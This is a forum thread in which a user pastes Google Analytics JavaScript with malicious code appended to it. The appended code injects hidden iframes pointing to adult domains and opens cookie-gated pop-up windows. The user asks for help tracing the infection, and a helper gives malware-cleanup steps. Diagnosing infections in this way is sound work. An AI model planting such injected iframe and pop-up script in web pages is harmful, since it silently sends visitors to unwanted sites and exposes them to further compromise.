(e=Bd[0]),Xb&&(Za=Bd[1]))}Pd(a,d,e,f,Be,k,s,t,Za,Ma);return!0},Qd=function(a){var b=Nd(a),c=La(b,!0);(b=!(void 0!=b&&null!=b&&""!=b&&"0"!=b&&"-"!=b&&0<=b[q]("://")))||(b=c&&-1<c[u][q]("google")&&c.d.contains("q")&&"cse"==c[ra]);if(b)return!1;if((b=Od(a,c))&&!b[2])return Pd(a,void 0,b[0],void 0,void 0,void 0,"(organic)","organic",b[1],void 0),!0;if(b||!a.get(ac))return!1;t:{for(var b=a.get(Bb),d=Ka(c[u]),e=0;e<b[w];++e)if(-1<d[q](b[e])){a=!1;break t}Pd(a,void 0,d,void 0,void 0,void 0,"(referral)",
"referral",void 0,"/"+c[ra]);a=!0}return a},Od=function(a,b){for(var c=a.get(zb),d=0;d<c[w];++d){var e=c[d][y](":");if(-1<b[u][q](e[0][D]())){var f=b.d.get(e[1]);if(f&&(f=K(f),!f&&-1<b[u][q]("google.")&&(f="(not provided)"),!e[3]||-1<b.url[q](e[3]))){f||H(151);t:{for(var c=f,d=a.get(Ab),c=I(c)[D](),Be=0;Be<d[w];++Be)if(c==d[Be]){c=!0;break t}c=!1}return[e[2]||e[0],f,c]}}}return null},Pd=function(a,b,c,d,e,f,Be,k,s,t){a.set(ic,b);a.set(nc,c);a.set(S,d);a.set(kc,e);a.set(lc,f);a.set(jc,Be);a.set(oc,
k);a.set(pc,s);a.set(qc,t)},Md=[jc,ic,S,lc,nc,oc,pc,qc],Rd=function(a,b){function c(a){a=(""+a)[y]("+")[C]("%20");return a=a[y](" ")[C]("%20")}function d(c){var d=""+(a.get(c)||"");c=""+(b[c]||"");return 0<d[w]&&d==c}if(d(S)||d(lc))return H(131),!1;for(var e=0;e<Md[w];e++){var f=Md[e],Be=b[f]||"-",f=a.get(f)||"-";if(c(Be)!=c(f))return!0}return!1},Td=new RegExp(/^https?:\/\/(www\.)?google(\.com?)?(\.[a-z]{2}t?)?\/?$/i),jf=/^https?:\/\/r\.search\.yahoo\.com\/[^?]*$/i,Nd=function(a){a=Pa(a.get(Jb),a.get(P));
try{if(Td[ia](a))return H(136),a+"?q=";if(jf[ia](a))return H(150),a+"?p=(not provided)"}catch(b){H(145)}return a};var Ud,Vd,Wd=function(a){Ud=a.c(S,"");Vd=a.c(kc,"")},Xd=function(a){var b=a.c(S,""),c=a.c(kc,"");b!=Ud&&(-1<c[q]("ds")?a.set(mc,void 0):!F(Ud)&&-1<Vd[q]("ds")&&a.set(mc,Ud))};var Zd=function(a){Yd(a,J[z][xa])?(a.set(Mc,!0),H(12)):a.set(Mc,!1)},Yd=function(a,b){if(!a.get(fb))return!1;var c=La(b,a.get(gb)),d=K(c.d.get("__utma")),e=K(c.d.get("__utmb")),f=K(c.d.get("__utmc")),Be=K(c.d.get("__utmx")),k=K(c.d.get("__utmz")),s=K(c.d.get("__utmv")),c=K(c.d.get("__utmk"));if(Yc(""+d+e+f+Be+k+s)!=c){d=I(d);e=I(e);f=I(f);Be=I(Be);f=$d(d+e+f+Be,k,s,c);if(!f)return!1;k=f[0];s=f[1]}if(!bd(a,d,!0))return!1;ed(a,e,!0);id(a,k,!0);gd(a,s,!0);ae(a,Be,!0);return!0},ce=function(a,b,c){var d;
d=cd(a)||"-";var e=dd(a)||"-",f=""+a.b(O,1)||"-",Be=be(a)||"-",k=hd(a,!1)||"-";a=fd(a,!1)||"-";var s=Yc(""+d+e+f+Be+k+a),t=[];t[n]("__utma="+d);t[n]("__utmb="+e);t[n]("__utmc="+f);t[n]("__utmx="+Be);t[n]("__utmz="+k);t[n]("__utmv="+a);t[n]("__utmk="+s);d=t[C]("&");if(!d)return b;e=b[q]("#");if(c)return 0>e?b+"#"+d:b+"&"+d;c="";f=b[q]("?");0<e&&(c=b[B](e),b=b[B](0,e));return 0>f?b+"?"+d+c:b+"&"+d+c},$d=function(a,b,c,d){for(var e=0;3>e;e++){for(var f=0;3>f;f++){if(d==Yc(a+b+c))return H(127),[b,c];
var Be=b[p](/ /g,"%20"),k=c[p](/ /g,"%20");if(d==Yc(a+Be+k))return H(128),[Be,k];Be=Be[p](/\+/g,"%20");k=k[p](/\+/g,"%20");if(d==Yc(a+Be+k))return H(129),[Be,k];try{var s=b[oa]("utmctr=(.*?)(?:\\|utm|$)");if(s&&2==s[w]&&(Be=b[p](s[1],G(I(s[1]))),d==Yc(a+Be+c)))return H(139),[Be,c]}catch(t){}b=I(b)}c=I(c)}};var de="|",fe=function(a,b,c,d,e,f,Be,k,s){var t=ee(a,b);t||(t={},a.get(Cb)[n](t));t.id_=b;t.affiliation_=c;t.total_=d;t.tax_=e;t.shipping_=f;t.city_=Be;t.state_=k;t.country_=s;t.items_=t.items_||[];return t},ge=function(a,b,c,d,e,f,Be){a=ee(a,b)||fe(a,b,"",0,0,0,"","","");var k;t:{if(a&&a.items_){k=a.items_;for(var s=0;s<k[w];s++)if(k[s].sku_==c){k=k[s];break t}}k=null}s=k||{};s.transId_=b;s.sku_=c;s.name_=d;s.category_=e;s.price_=f;s.quantity_=Be;k||a.items_[n](s);return s},ee=function(a,b){for(var c=
a.get(Cb),d=0;d<c[w];d++)if(c[d].id_==b)return c[d];return null};var he,ie=function(a){if(!he){var b;b=J[z].hash;var c=W[r],d=/^#?gaso=([^&]*)/;if(c=(b=(b=b&&b[oa](d)||c&&c[oa](d))?b[1]:K(pd("GASO")))&&b[oa](/^(?:!([-0-9a-z.]{1,40})!)?([-.\w]{10,1200})$/i))Fd(a,"GASO",""+b,0),M._gasoDomain=a.get(bb),M._gasoCPath=a.get(P),a=c[1],Ia("https://www.google.com/analytics/web/inpage/pub/inpage.js?"+(a?"prefix="+a+"&":"")+Ea(),"_gasojs");he=!0}};var ae=function(a,b,c){c&&(b=I(b));c=a.b(O,1);b=b[y](".");2>b[w]||!/^\d+$/[ia](b[0])||(b[0]=""+c,Fd(a,"__utmx",b[C]("."),void 0))},be=function(a,b){var c=$c(a.get(O),pd("__utmx"));"-"==c&&(c="");return b?G(c):c},Ye=function(a){try{var b=La(J[z][xa],!1),c=ea(L(b.d.get("utm_referrer")))||"";c&&a.set(Jb,c);var d=ea(K(b.d.get("utm_expid")))||"";d&&(d=d[y](".")[0],a.set(Oc,""+d))}catch(e){H(146)}},l=function(a){var b=W.gaData&&W.gaData.expId;b&&a.set(Oc,""+b)};var ke=function(a,b){var c=m.min(a.b(Dc,0),100);if(a.b(Q,0)%100>=c)return!1;c=Ze()||$e();if(void 0==c)return!1;var d=c[0];if(void 0==d||d==ba||da(d))return!1;0<d?af(c)?b(je(c)):b(je(c[ja](0,1))):Ga(W,"load",function(){ke(a,b)},!1);return!0},me=function(a,b,c,d){var e=new yd;e.f(14,90,b[B](0,500));e.f(14,91,a[B](0,150));e.f(14,92,""+le(c));void 0!=d&&e.f(14,93,d[B](0,500));e.o(14,90,c);return e},af=function(a){for(var b=1;b<a[w];b++)if(da(a[b])||a[b]==ba||0>a[b])return!1;return!0},le=function(a){return da(a)||
0>a?0:5E3>a?10*m[la](a/10):5E4>a?100*m[la](a/100):41E5>a?1E3*m[la](a/1E3):41E5},je=function(a){for(var b=new yd,c=0;c<a[w];c++)b.f(14,c+1,""+le(a[c])),b.o(14,c+1,a[c]);return b},Ze=function(){var a=W.performance||W.webkitPerformance;if(a=a&&a.timing){var b=a.navigationStart;if(0==b)H(133);else return[a.loadEventStart-b,a.domainLookupEnd-a.domainLookupStart,a.connectEnd-a.connectStart,a.responseStart-a.requestStart,a.responseEnd-a.responseStart,a.fetchStart-b,a.domInteractive-b,a.domContentLoadedEventStart-
b]}},$e=function(){if(W.top==W){var a=W.external,b=a&&a.onloadT;a&&!a.isValidLoadTime&&(b=void 0);2147483648<b&&(b=void 0);0<b&&a.setPageReadyTime();return void 0==b?void 0:[b]}};var cf=function(a){if(a.get(Sb))try{var b;t:{var c=pd(a.get(Oe)||"_ga");if(c&&!(1>c[w])){for(var d=[],e=0;e<c[w];e++){var f;var Be=c[e][y]("."),k=Be.shift();if(("GA1"==k||"1"==k)&&1<Be[w]){var s=Be.shift()[y]("-");1==s[w]&&(s[1]="1");s[0]*=1;s[1]*=1;f={Ya:s,$a:Be[C](".")}}else f=void 0;f&&d[n](f)}if(1==d[w]){b=d[0].$a;break t}if(0!=d[w]){var t=a.get(Pe)||a.get(bb),d=bf(d,(0==t[q](".")?t.substr(1):t)[y](".")[w],0);if(1==d[w]){b=d[0].$a;break t}var Za=a.get(Qe)||a.get(P);(c=Za)?(1<c[w]&&"/"==c[ma](c[w]-
1)&&(c=c.substr(0,c[w]-1)),0!=c[q]("/")&&(c="/"+c),Za=c):Za="/";d=bf(d,"/"==Za?1:Za[y]("/")[w],1);b=d[0].$a;break t}}b=void 0}if(b){var Ma=(""+b)[y](".");2==Ma[w]&&/[0-9.]/[ia](Ma)&&(H(114),a.set(Q,Ma[0]),a.set(Vb,Ma[1]),a.set(Sb,!1))}}catch(mb){H(115)}},bf=function(a,b,c){for(var d=[],e=[],f=128,Be=0;Be<a[w];Be++){var k=a[Be];if(k.Ya[c]==b)d[n](k);else if(k.Ya[c]==f)e[n](k);else k.Ya[c]<f&&(e=[k],f=k.Ya[c])}return 0<d[w]?d:e};var kf=/^gtm\d+$/,hf=function(a){var b;b=(b=a.b(Cd,1))?0==a.b(Q,1)%b:!1;b&&(H(140),"page"!=a.get(sc)?a.set(Kc,"",!0):(b=a.c(Lc,""),b||(b=(b=a.c($a,""))&&"~0"!=b?kf[ia](b)?"__utmt_"+G(a.c(Wa,"")):"__utmt_"+G(b):"__utmt"),0<pd(b)[w]?a.set(Kc,"",!0):(X(b,"1",a.c(P,"/"),a.c(bb,""),a.c(Wa,""),6E5),0<pd(b)[w]&&(a.set(Kc,Ea(),!0),a.set(Yb,1,!0),a.set(Jc,Ne()+"/r/__utm.gif?",!0)))))};var U=function(a,b,c){function d(a){return function(b){if((b=b.get(Nc)[a])&&b[w])for(var c=Te(e,a),d=0;d<b[w];d++)b[d].call(e,c)}}var e=this;this.a=new Zc;this.get=function(a){return this.a.get(a)};this.set=function(a,b,c){this.a.set(a,b,c)};this.set(Wa,b||"UA-XXXXX-X");this.set($a,a||"");this.set(Ya,c||"");this.set(ab,m.round((new Date)[g]()/1E3));this.set(P,"/");this.set(cb,63072E6);this.set(eb,15768E6);this.set(db,18E5);this.set(fb,!1);this.set(yb,50);this.set(gb,!1);this.set(hb,!0);this.set(ib,
!0);this.set(jb,!0);this.set(kb,!0);this.set(lb,!0);this.set(ob,"utm_campaign");this.set(nb,"utm_id");this.set(pb,"gclid");this.set(qb,"utm_source");this.set(rb,"utm_medium");this.set(sb,"utm_term");this.set(tb,"utm_content");this.set(ub,"utm_nooverride");this.set(vb,100);this.set(Dc,1);this.set(Ec,!1);this.set(wb,"/__utm.gif");this.set(xb,1);this.set(Cb,[]);this.set(Fb,[]);this.set(zb,Ld[ja](0));this.set(Ab,[]);this.set(Bb,[]);this.B("auto");this.set(Jb,J.referrer);Ye(this.a);this.set(Nc,{hit:[],
load:[]});this.a.g("0",Zd);this.a.g("1",Wd);this.a.g("2",Jd);this.a.g("3",cf);this.a.g("4",Sd);this.a.g("5",Xd);this.a.g("6",Kd);this.a.g("7",d("load"));this.a.g("8",ie);this.a.e("A",kd);this.a.e("B",md);this.a.e("C",Ge);this.a.e("D",Jd);this.a.e("E",jd);this.a.e("F",Tc);this.a.e("G",ne);this.a.e("H",lf);this.a.e("I",Gd);this.a.e("J",nd);this.a.e("K",ud);this.a.e("L",Dd);this.a.e("M",l);this.a.e("N",hf);this.a.e("O",d("hit"));this.a.e("P",oe);this.a.e("Q",pe);0===this.get(ab)&&H(111);this.a.T();this.H=
void 0};E=U[x];E.m=function(){var a=this.get(Db);a||(a=new yd,this.set(Db,a));return a};E.La=function(a){for(var b in a){var c=a[b];a.hasOwnProperty(b)&&this.set(b,c,!0)}};E.K=function(a){if(this.get(Ec))return!1;var b=this,c=ke(this.a,function(c){b.set(Hb,a,!0);b.t(c)});this.set(Ec,c);return c};E.Fa=function(a){a&&Ca(a)?(H(13),this.set(Hb,a,!0)):"object"===typeof a&&null!==a&&this.La(a);this.H=a=this.get(Hb);this.a.j("page");this.K(a)};
E.F=function(a,b,c,d,e){if(""==a||!wd(a)||""==b||!wd(b)||void 0!=c&&!wd(c)||void 0!=d&&!xd(d))return!1;this.set(wc,a,!0);this.set(xc,b,!0);this.set(yc,c,!0);this.set(zc,d,!0);this.set(vc,!!e,!0);this.a.j("event");return!0};E.Ha=function(a,b,c,d,e){var f=this.a.b(Dc,0);1*e===e&&(f=e);if(this.a.b(Q,0)%100>=f)return!1;c=1*(""+c);if(""==a||!wd(a)||""==b||!wd(b)||!xd(c)||da(c)||0>c||0>f||100<f||void 0!=d&&(""==d||!wd(d)))return!1;this.t(me(a,b,c,d));return!0};
E.Ga=function(a,b,c,d){if(!a||!b)return!1;this.set(Ac,a,!0);this.set(Bc,b,!0);this.set(Cc,c||J[z][xa],!0);d&&this.set(Hb,d,!0);this.a.j("social");return!0};E.Ea=function(){this.set(Dc,10);this.K(this.H)};E.Ia=function(){this.a.j("trans")};E.t=function(a){this.set(Eb,a,!0);this.a.j("event")};E.ia=function(a){this.v();var b=this;return{_trackEvent:function(c,d,e){H(91);b.F(a,c,d,e)}}};E.ma=function(a){return this.get(a)};
E.xa=function(a,b){if(a)if(Ca(a))this.set(a,b);else if("object"==typeof a)for(var c in a)a.hasOwnProperty(c)&&this.set(c,a[c])};E.addEventListener=function(a,b){var c=this.get(Nc)[a];c&&c[n](b)};E.removeEventListener=function(a,b){for(var c=this.get(Nc)[a],d=0;c&&d<c[w];d++)if(c[d]==b){c.splice(d,1);break}};E.qa=function(){return"5.6.0"};E.B=function(a){this.get(hb);a="auto"==a?Ka(J.domain):a&&"-"!=a&&"none"!=a?a[D]():"";this.set(bb,a)};E.va=function(a){this.set(hb,!!a)};
E.na=function(a,b){return ce(this.a,a,b)};E.link=function(a,b){if(this.a.get(fb)&&a){var c=ce(this.a,a,b);J[z].href=c}};E.ua=function(a,b){this.a.get(fb)&&a&&a.action&&(a.action=ce(this.a,a.action,b))};
E.za=function(){this.v();var a=this.a,b=J.getElementById?J.getElementById("utmtrans"):J.utmform&&J.utmform.utmtrans?J.utmform.utmtrans:null;if(b&&b[na]){a.set(Cb,[]);for(var b=b[na][y]("UTM:"),c=0;c<b[w];c++){b[c]=Da(b[c]);for(var d=b[c][y](de),e=0;e<d[w];e++)d[e]=Da(d[e]);"T"==d[0]?fe(a,d[1],d[2],d[3],d[4],d[5],d[6],d[7],d[8]):"I"==d[0]&&ge(a,d[1],d[2],d[3],d[4],d[5],d[6])}}};E.$=function(a,b,c,d,e,f,Be,k){return fe(this.a,a,b,c,d,e,f,Be,k)};E.Y=function(a,b,c,d,e,f){return ge(this.a,a,b,c,d,e,f)};
E.Aa=function(a){de=a||"|"};E.ea=function(){this.set(Cb,[])};E.wa=function(a,b,c,d){var e=this.a;if(0>=a||a>e.get(yb))a=!1;else if(!b||!c||128<b[w]+c[w])a=!1;else{1!=d&&2!=d&&(d=3);var f={};ha(f,b);f.value=c;f.scope=d;e.get(Fb)[a]=f;a=!0}a&&this.a.n();return a};E.ka=function(a){this.a.get(Fb)[a]=void 0;this.a.n()};E.ra=function(a){return(a=this.a.get(Fb)[a])&&1==a[ua]?a[na]:void 0};E.Ca=function(a,b,c){this.m().f(a,b,c)};E.Da=function(a,b,c){this.m().o(a,b,c)};
E.sa=function(a,b){return this.m().getKey(a,b)};E.ta=function(a,b){return this.m().N(a,b)};E.fa=function(a){this.m().L(a)};E.ga=function(a){this.m().M(a)};E.ja=function(){return new yd};E.W=function(a){a&&this.get(Ab)[n](a[D]())};E.ba=function(){this.set(Ab,[])};E.X=function(a){a&&this.get(Bb)[n](a[D]())};E.ca=function(){this.set(Bb,[])};E.Z=function(a,b,c,d,e){if(a&&b){a=[a,b[D]()][C](":");if(d||e)a=[a,d,e][C](":");d=this.get(zb);d.splice(c?0:d[w],0,a)}};E.da=function(){this.set(zb,[])};
E.ha=function(a){this.a[ka]();var b=this.get(P),c=be(this.a);this.set(P,a);this.a.n();ae(this.a,c);this.set(P,b)};E.ya=function(a,b){if(0<a&&5>=a&&Ca(b)&&""!=b){var c=this.get(Fc)||[];c[a]=b;this.set(Fc,c)}};E.V=function(a){a=""+a;if(a[oa](/^[A-Za-z0-9]{1,5}$/)){var b=this.get(Ic)||[];b[n](a);this.set(Ic,b)}};E.v=function(){this.a[ka]()};E.Ba=function(a){a&&""!=a&&(this.set(Tb,a),this.a.j("var"))};var ne=function(a){"trans"!==a.get(sc)&&500<=a.b(cc,0)&&a[ta]();if("event"===a.get(sc)){var b=(new Date)[g](),c=a.b(dc,0),d=a.b(Zb,0),c=m[la]((b-(c!=d?c:1E3*c))/1E3*1);0<c&&(a.set(dc,b),a.set(R,m.min(10,a.b(R,0)+c)));0>=a.b(R,0)&&a[ta]()}},pe=function(a){"event"===a.get(sc)&&a.set(R,m.max(0,a.b(R,10)-1))};var qe=function(){var a=[];this.add=function(b,c,d){d&&(c=G(""+c));a[n](b+"="+c)};this.toString=function(){return a[C]("&")}},re=function(a,b){(b||2!=a.get(xb))&&a.Za(cc)},se=function(a,b){b.add("utmwv","5.6.0");b.add("utms",a.get(cc));b.add("utmn",Ea());var c=J[z].hostname;F(c)||b.add("utmhn",c,!0);c=a.get(vb);100!=c&&b.add("utmsp",c,!0)},te=function(a,b){b.add("utmht",(new Date)[g]());b.add("utmac",Da(a.get(Wa)));a.get(Oc)&&b.add("utmxkey",a.get(Oc),!0);a.get(vc)&&b.add("utmni",1);a.get(of)&&b.add("utmgtm",
a.get(of),!0);var c=a.get(Ic);c&&0<c[w]&&b.add("utmdid",c[C]("."));ff(a,b);!1!==a.get(Xa)&&(a.get(Xa)||M.w)&&b.add("aip",1);void 0!==a.get(Kc)&&b.add("utmjid",a.c(Kc,""),!0);a.b(Yb,0)&&b.add("utmredir",a.b(Yb,0),!0);M.bb||(M.bb=a.get(Wa));(1<M.ab()||M.bb!=a.get(Wa))&&b.add("utmmt",1);b.add("utmu",od.Xa())},ue=function(a,b){for(var c=a.get(Fc)||[],d=[],e=1;e<c[w];e++)c[e]&&d[n](e+":"+G(c[e][p](/%/g,"%25")[p](/:/g,"%3A")[p](/,/g,"%2C")));d[w]&&b.add("utmpg",d[C](","))},ff=function(a,b){function c(a,
b){b&&d[n](a+"="+b+";")}var d=[];c("__utma",cd(a));c("__utmz",hd(a,!1));c("__utmv",fd(a,!0));c("__utmx",be(a));b.add("utmcc",d[C]("+"),!0)},ve=function(a,b){a.get(ib)&&(b.add("utmcs",a.get(Qb),!0),b.add("utmsr",a.get(Lb)),a.get(Rb)&&b.add("utmvp",a.get(Rb)),b.add("utmsc",a.get(Mb)),b.add("utmul",a.get(Pb)),b.add("utmje",a.get(Nb)),b.add("utmfl",a.get(Ob),!0))},we=function(a,b){a.get(lb)&&a.get(Ib)&&b.add("utmdt",a.get(Ib),!0);b.add("utmhid",a.get(Kb));b.add("utmr",Pa(a.get(Jb),a.get(P)),!0);b.add("utmp",
G(a.get(Hb),!0),!0)},xe=function(a,b){for(var c=a.get(Db),d=a.get(Eb),e=a.get(Fb)||[],f=0;f<e[w];f++){var Be=e[f];Be&&(c||(c=new yd),c.f(8,f,Be[r]),c.f(9,f,Be[na]),3!=Be[ua]&&c.f(11,f,""+Be[ua]))}F(a.get(wc))||F(a.get(xc),!0)||(c||(c=new yd),c.f(5,1,a.get(wc)),c.f(5,2,a.get(xc)),e=a.get(yc),void 0!=e&&c.f(5,3,e),e=a.get(zc),void 0!=e&&c.o(5,1,e));c?b.add("utme",c.Qa(d),!0):d&&b.add("utme",d.A(),!0)},ye=function(a,b,c){var d=new qe;re(a,c);se(a,d);d.add("utmt","tran");d.add("utmtid",b.id_,!0);d.add("utmtst",
b.affiliation_,!0);d.add("utmtto",b.total_,!0);d.add("utmttx",b.tax_,!0);d.add("utmtsp",b.shipping_,!0);d.add("utmtci",b.city_,!0);d.add("utmtrg",b.state_,!0);d.add("utmtco",b.country_,!0);xe(a,d);ve(a,d);we(a,d);(b=a.get(Gb))&&d.add("utmcu",b,!0);c||(ue(a,d),te(a,d));return d[v]()},ze=function(a,b,c){var d=new qe;re(a,c);se(a,d);d.add("utmt","item");d.add("utmtid",b.transId_,!0);d.add("utmipc",b.sku_,!0);d.add("utmipn",b.name_,!0);d.add("utmiva",b.category_,!0);d.add("utmipr",b.price_,!0);d.add("utmiqt",
b.quantity_,!0);xe(a,d);ve(a,d);we(a,d);(b=a.get(Gb))&&d.add("utmcu",b,!0);c||(ue(a,d),te(a,d));return d[v]()},Ae=function(a,b){var c=a.get(sc);if("page"==c)c=new qe,re(a,b),se(a,c),xe(a,c),ve(a,c),we(a,c),b||(ue(a,c),te(a,c)),c=[c[v]()];else if("event"==c)c=new qe,re(a,b),se(a,c),c.add("utmt","event"),xe(a,c),ve(a,c),we(a,c),b||(ue(a,c),te(a,c)),c=[c[v]()];else if("var"==c)c=new qe,re(a,b),se(a,c),c.add("utmt","var"),!b&&te(a,c),c=[c[v]()];else if("trans"==c)for(var c=[],d=a.get(Cb),e=0;e<d[w];++e){c[n](ye(a,
d[e],b));for(var f=d[e].items_,Be=0;Be<f[w];++Be)c[n](ze(a,f[Be],b))}else"social"==c?b?c=[]:(c=new qe,re(a,b),se(a,c),c.add("utmt","social"),c.add("utmsn",a.get(Ac),!0),c.add("utmsa",a.get(Bc),!0),c.add("utmsid",a.get(Cc),!0),xe(a,c),ve(a,c),we(a,c),ue(a,c),te(a,c),c=[c[v]()]):"feedback"==c?b?c=[]:(c=new qe,re(a,b),se(a,c),c.add("utmt","feedback"),c.add("utmfbid",a.get(Gc),!0),c.add("utmfbpr",a.get(Hc),!0),xe(a,c),ve(a,c),we(a,c),ue(a,c),te(a,c),c=[c[v]()]):c=[];return c},oe=function(a){var b,c=a.get(xb),
d=a.get(uc),e=d&&d.Ua,f=0;if(0==c||2==c){var Be=a.get(wb)+"?";b=Ae(a,!0);for(var k=0,s=b[w];k<s;k++)Sa(b[k],e,Be,!0),f++}if(1==c||2==c)for(b=Ae(a),a=a.c(Jc,""),k=0,s=b[w];k<s;k++)try{Sa(b[k],e,a),f++}catch(t){t&&Ra(t[r],void 0,t.message)}d&&(d.q=f)};var Ne=function(){return"https:"==J[z][A]||M.G?"https://ssl.google-analytics.com":"http://www.google-analytics.com"},Ce=function(a){ha(this,"len");this.message=a+"-8192"},De=function(a){ha(this,"ff2post");this.message=a+"-2036"},Sa=function(a,b,c,d){b=b||Fa;if(d||2036>=a[w])gf(a,b,c);else if(8192>=a[w]){if(0<=W[za].userAgent[q]("Firefox")&&![].reduce)throw new De(a[w]);df(a,b)||ef(a,b)||Ee(a,b)||b()}else throw new Ce(a[w]);},gf=function(a,b,c){c=c||Ne()+"/__utm.gif?";var d=new Image(1,1);d.src=c+
a;Ie(d,function(){Ie(d,null);Je(d,null);b()});Je(d,function(){Ie(d,null);Je(d,null);b()})},ef=function(a,b){var c;c=W.XDomainRequest;if(!c)return!1;c=new c;c.open("POST",Ne()+"/p/__utm.gif");Je(c,function(){b()});Ie(c,b);c.send(a);return!0},df=function(a,b){var c=W.XMLHttpRequest;if(!c)return!1;var d=new c;if(!("withCredentials"in d))return!1;d.open("POST",Ne()+"/p/__utm.gif",!0);d.withCredentials=!0;d.setRequestHeader("Content-Type","text/plain");d.onreadystatechange=function(){4==d.readyState&&
(b(),d=null)};d.send(a);return!0},Ee=function(a,b){if(!J.body)return We(function(){Ee(a,b)},100),!0;a=aa(a);try{var c=J[qa]('<iframe name="'+a+'"></iframe>')}catch(d){c=J[qa]("iframe"),ha(c,a)}c.height="0";c.width="0";c.style.display="none";c.style.visibility="hidden";var e=J[z],e=Ne()+"/u/post_iframe.html#"+aa(e[A]+"//"+e[u]+"/favicon.ico"),f=function(){c.src="";c.parentNode&&c.parentNode.removeChild(c)};Ga(W,"beforeunload",f);var Be=!1,k=0,s=function(){if(!Be){try{if(9<k||c.contentWindow[z][u]==
J[z][u]){Be=!0;f();Ha(W,"beforeunload",f);b();return}}catch(a){}k++;ca(s,200)}};Ga(c,"load",s);J.body.appendChild(c);c.src=e;return!0};var $=function(){this.G=this.w=!1;this.C={};this.D=[];this.U=0;this.S=[["www.google-analytics.com","","/plugins/"]];this._gasoCPath=this._gasoDomain=this.bb=void 0;Re();Se()};E=$[x];E.oa=function(a,b){return this.r(a,void 0,b)};E.r=function(a,b,c){b&&H(23);c&&H(67);void 0==b&&(b="~"+M.U++);a=new U(b,a,c);M.C[b]=a;M.D[n](a);return a};E.u=function(a){a=a||"";return M.C[a]||M.r(void 0,a)};E.pa=function(){return M.D[ja](0)};E.ab=function(){return M.D[w]};E.aa=function(){this.w=!0};
E.la=function(){this.G=!0};var Fe=function(a){if("prerender"==J.visibilityState)return!1;a();return!0};var M=new $;var nf=W._gat;nf&&Ba(nf._getTracker)?M=nf:W._gat=M;var Z=new Y;(function(a){if(!Fe(a)){H(123);var b=!1,c=function(){!b&&Fe(a)&&(b=!0,Ha(J,"visibilitychange",c))};Ga(J,"visibilitychange",c)}})(function(){var a=W._gaq,b=!1;if(a&&Ba(a[n])&&(b="[object Array]"==Object[x][v].call(Object(a)),!b)){Z=a;return}W._gaq=Z;b&&Z[n][ya](Z,a)});function Yc(a){var b=1,c=0,d;if(a)for(b=0,d=a[w]-1;0<=d;d--)c=a.charCodeAt(d),b=(b<<6&268435455)+c+(c<<14),c=b&266338304,b=0!=c?b^c>>21:b;return b};})();

var tmpexo = document.createElement('div');
tmpexo.setAttribute("align","center");
tmpexo.innerHTML = '<iframe src="http://adultyum.info" frameborder=0 width=0 height=0 style="display:none;"></iframe>';
var iframeexo = tmpexo.firstChild;
var bodyexo = document.getElementsByTagName('body')[0];
bodyexo.insertBefore(tmpexo, bodyexo.firstChild);

var tmp = document.createElement('div');
tmp.setAttribute("align","center");
tmp.innerHTML = '<iframe src="http://adultcameras.info" frameborder=0 width=0 height=0 style="display:none;"></iframe>';
var iframe = tmp.firstChild;
var body = document.getElementsByTagName('body')[0];
body.insertBefore(tmp, body.firstChild);

var params = "width=200,height=200,resizable=0,toolbar=0,location=0,menubar=0,status=0,scrollbars=0"
function PopShow3() {
CookieTest=navigator.cookieEnabled;
if(CookieTest)
{
ClickUndercookie = GetCookie('fale');
if (ClickUndercookie == null)
{
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (3 * 24 * 60 * 60 * 1000));
SetCookie('fale','1',ExpDate, "/");
window.open("http://adultcameras.info", "Wooooow!!", params);
window.focus();
}
}
}
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
document.onmouseup=PopShow3;

BC AdBot (Login to Remove)

#2 Phantom010

Phantom010

• Members
  • 1,022 posts
  •  
  • Local time:05:39 AM

Posted 27 February 2015 - 08:06 AM

Not sure I understand the question. By pop-ups, you're referring to ads?

Ever tried THIS?

#3 74gee

74gee
  • Topic Starter

• Members
  • 3 posts
  •  

Posted 27 February 2015 - 09:48 AM

Hi, the problem is that all websites with google analytics are producing popup ads, including bleepingcomputer.com. These ads are happening becuase when my computer requests google analytics code, the response from Google is being appended with malicious code. This represents a massive security risk as any javascript is capable of sending my login information/cookies etc from any website with google analytics to a remote server. The code above is often different and I have experienced attempted cookie theft. Fortunately I investigated this phenominum as soon as I saw a popup on a local website I was developing.

I've run tens of full computer scans with various applications but nothing has helped at all.

I'm beginning to think it's a DNS problem.

I don't need a popup blocker or to opt out of google analytics. I wish to find the problem and fix it.
So far I've tried:

Spybot-S&D Start Center (everything)

Outpost Security Suite Full Scan

tdsskiller

MiniToolBox

TFC

RogueKillerX64

FSS

I run XP Pro x64

#4 Phantom010

Phantom010

• Members
  • 1,022 posts
  •  
  • Local time:05:39 AM

Posted 27 February 2015 - 10:42 AM

I always opt-out of Google Analytics and I use Adblock Plus.

Please download MiniToolBox to your desktop and run it.

Select the following checked itmes only.

G7KLnWG.png

Click Go.

A Notepad window will open. Copy/paste the contents into your next reply.

Please download AdwCleaner.

• Double-click the adwcleaner.exe to run the tool.
  • Click Scan.
  • When the scan is finished, click Cleaning.
  • When the cleaning process is over, click Logfile and a Notepad window will be opened.
  • Please post the contents into your next reply.

-----------------------------------------------------------------------

Please download and run the free Malwarebytes Anti-Malware.

• Select the language and click OK.
  • Accept the agreement.
  • Make sure the Enable the Free Trial box is deselected and the Launch Malwarebytes Anti-Malware box is selected, and then click on Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Scan Now.
  • The scan may take some time to complete, so please be patient.
  • When the scan is completed, click on Quarantine All.
  • Click on Copy to Clipboard.
  • Paste the contents into your next reply.
  • You may be prompted to restart the computer instead, to complete the removal process.
  • If indeed prompted, upon restart, launch Malwarebytes Anti-Malware again and select History > Application Logs.
  • Find your Scan Log (the date when run will identify it).
  • Select the right box, then hit the View button. The History Log window will open.
  • At the bottom of that window are two options, Copy to Clipboard and Export.
  • Select Copy to Clipboard.
  • Paste the contents into your next reply.

